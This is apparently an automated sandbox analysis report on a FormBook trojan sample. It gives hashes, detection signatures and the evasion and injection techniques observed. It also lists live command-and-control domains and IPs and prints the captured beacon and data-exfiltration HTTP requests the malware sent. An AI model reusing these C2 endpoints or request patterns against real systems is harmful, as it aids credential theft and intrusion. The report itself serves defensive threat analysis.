Windows Analysis Report
Lc8xQv8iZY.exe

Overview

General Information

Sample Name: Lc8xQv8iZY.exe
Analysis ID: 756323
MD5: 30571d64c9a9ed267159fa941a20840c
SHA1: bfb81d8a7c94781b3bd939bd17d500ae61b2ff70
SHA256: 85d6c9eac93fb8818d37dc15110ebd060b3e9df48043ee6bcf349df6aed047c5
Tags: 32, exe, Formbook, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

AV Detection

Source: Lc8xQv8iZY.exe ReversingLabs: Detection: 48%
Source: Lc8xQv8iZY.exe Virustotal: Detection: 47%
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.lopezmodeling.com/henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg Avira URL Cloud: Label: malware
Source: http://www.eufidelizo.com/henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg Avira URL Cloud: Label: malware
Source: http://www.brennancorps.info/henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg Avira URL Cloud: Label: malware
Source: http://www.lopezmodeling.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.brennancorps.info/henz/ Avira URL Cloud: Label: malware
Source: www.brennancorps.info/henz/ Avira URL Cloud: Label: malware
Source: http://www.lyonfinancialusa.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.afterdarksocial.club/henz/ Avira URL Cloud: Label: malware
Source: http://www.foxwhistle.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.patrickguarte.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.patrickguarte.com/henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg Avira URL Cloud: Label: malware
Source: eufidelizo.com Virustotal: Detection: 8%
Source: www.eufidelizo.com Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe ReversingLabs: Detection: 53%
Source: Lc8xQv8iZY.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Joe Sandbox ML: detected
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.brennancorps.info/henz/"]}
Source: Lc8xQv8iZY.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP source: hvbvmxm.exe, 00000001.00000003.304073189.0000000002740000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000001.00000003.303031511.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: hvbvmxm.exe, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00410370 FindFirstFileExW, 1_2_00410370

Networking

Source: C:\Windows\explorer.exe Domain query: www.patrickguarte.com
Source: C:\Windows\explorer.exe Network Connect: 155.159.61.221 80
Source: C:\Windows\explorer.exe Domain query: www.eufidelizo.com
Source: C:\Windows\explorer.exe Network Connect: 192.185.35.86 80
Source: C:\Windows\explorer.exe Domain query: www.lyonfinancialusa.com
Source: C:\Windows\explorer.exe Domain query: www.afterdarksocial.club
Source: C:\Windows\explorer.exe Domain query: www.lopezmodeling.com
Source: C:\Windows\explorer.exe Network Connect: 192.185.217.47 80
Source: C:\Windows\explorer.exe Network Connect: 206.233.197.135 80
Source: C:\Windows\explorer.exe Network Connect: 154.22.100.62 80
Source: C:\Windows\explorer.exe Network Connect: 162.214.129.149 80
Source: C:\Windows\explorer.exe Domain query: www.foxwhistle.com
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80
Source: C:\Windows\explorer.exe Domain query: www.brennancorps.info
Source: C:\Windows\explorer.exe Domain query: www.19t221013d.tokyo
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
Source: Malware configuration extractor URLs: www.brennancorps.info/henz/
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: global traffic HTTP traffic detected: GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1Host: www.brennancorps.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1Host: www.lopezmodeling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1Host: www.foxwhistle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 192.185.217.47 192.185.217.47
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 4b 4d 30 4f 32 5f 38 30 57 4c 61 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.afterdarksocial.clubConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.afterdarksocial.clubUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.afterdarksocial.club/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 4d 79 37 32 35 65 52 55 37 4f 77 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jMy725eRU7OwshGSVcA).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.patrickguarte.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.patrickguarte.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.patrickguarte.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 6e 33 53 33 41 36 71 70 49 52 49 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63in3S3A6qpIRIDNF~GIA).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.brennancorps.infoConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.brennancorps.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brennancorps.info/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 43 36 36 7a 31 2d 46 33 50 30 6d 6f 65 62 4e 7a 7e 51 71 50 73 58 72 32 61 6b 65 42 31 62 43 41 6e 53 55 34 33 45 57 56 36 47 38 51 75 69 53 77 4b 78 55 5a 6d 32 77 6a 55 6a 77 6b 7a 66 75 54 6e 37 57 47 44 32 64 6d 59 52 64 38 52 4a 6a 62 62 50 55 4e 6b 69 49 58 75 42 41 6c 68 39 74 51 6c 72 42 51 56 52 4c 62 6e 50 6f 79 46 49 65 43 56 69 73 32 79 4d 59 73 55 32 49 66 73 4b 69 4b 66 63 31 64 35 65 4e 5f 61 39 53 2d 44 4c 72 4a 54 30 77 6f 41 6a 42 53 51 4a 37 68 6c 41 56 34 61 4f 37 69 65 4e 44 32 59 71 6a 41 33 6d 47 31 67 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=C66z1-F3P0moebNz~QqPsXr2akeB1bCAnSU43EWV6G8QuiSwKxUZm2wjUjwkzfuTn7WGD2dmYRd8RJjbbPUNkiIXuBAlh9tQlrBQVRLbnPoyFIeCVis2yMYsU2IfsKiKfc1d5eN_a9S-DLrJT0woAjBSQJ7hlAV4aO7ieND2YqjA3mG1gw).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lopezmodeling.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lopezmodeling.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lopezmodeling.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 51 72 76 61 43 39 61 69 56 32 4d 36 28 65 75 56 73 50 58 43 4c 75 38 51 48 75 32 52 48 34 28 72 32 39 32 74 4c 61 4b 33 32 77 6c 51 64 76 38 44 4f 6c 41 63 6c 6a 36 4d 38 45 6c 32 6a 75 71 59 6d 43 45 51 35 74 45 6a 39 53 49 6a 68 57 4f 46 43 30 54 36 70 68 55 78 63 59 75 64 78 2d 39 56 7e 4f 44 72 35 53 4e 52 6c 67 65 7a 51 66 28 65 6e 68 7a 75 54 34 42 5a 73 30 49 31 37 7a 73 43 70 68 6b 45 74 7a 70 4b 31 36 71 54 41 37 61 6e 31 6e 74 55 54 6d 6b 34 54 37 72 41 41 35 35 4b 6b 45 78 45 73 59 4d 6e 64 7a 51 78 7a 44 7e 4f 52 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=QrvaC9aiV2M6(euVsPXCLu8QHu2RH4(r292tLaK32wlQdv8DOlAclj6M8El2juqYmCEQ5tEj9SIjhWOFC0T6phUxcYudx-9V~ODr5SNRlgezQf(enhzuT4BZs0I17zsCphkEtzpK16qTA7an1ntUTmk4T7rAA55KkExEsYMndzQxzD~ORw).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.foxwhistle.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.foxwhistle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.foxwhistle.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 75 4b 4a 33 71 67 6f 51 6a 53 53 49 6c 37 32 53 57 52 62 78 6d 4a 66 79 62 2d 43 48 5a 61 64 44 71 46 6a 78 48 58 77 39 33 69 43 66 6a 62 65 45 52 54 39 32 4c 59 53 45 33 41 4d 38 63 33 61 5a 67 38 43 4b 6d 47 6a 6a 44 46 31 39 43 71 33 69 35 31 36 62 34 4c 61 63 41 5a 4c 31 77 7a 45 78 77 70 79 56 48 52 6b 62 4f 53 7e 71 41 33 58 61 4a 37 6b 37 62 74 6d 45 4b 38 6e 45 35 33 74 6f 56 37 6c 56 72 36 50 49 42 54 57 77 58 39 76 46 62 47 67 4c 7e 48 70 47 45 74 4f 2d 73 72 33 35 7e 37 51 67 4b 64 72 48 41 74 48 34 6c 47 7e 42 57 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=uKJ3qgoQjSSIl72SWRbxmJfyb-CHZadDqFjxHXw93iCfjbeERT92LYSE3AM8c3aZg8CKmGjjDF19Cq3i516b4LacAZL1wzExwpyVHRkbOS~qA3XaJ7k7btmEK8nE53toV7lVr6PIBTWwX9vFbGgL~HpGEtO-sr35~7QgKdrHAtH4lG~BWg).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:55:23 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 
69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:31 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 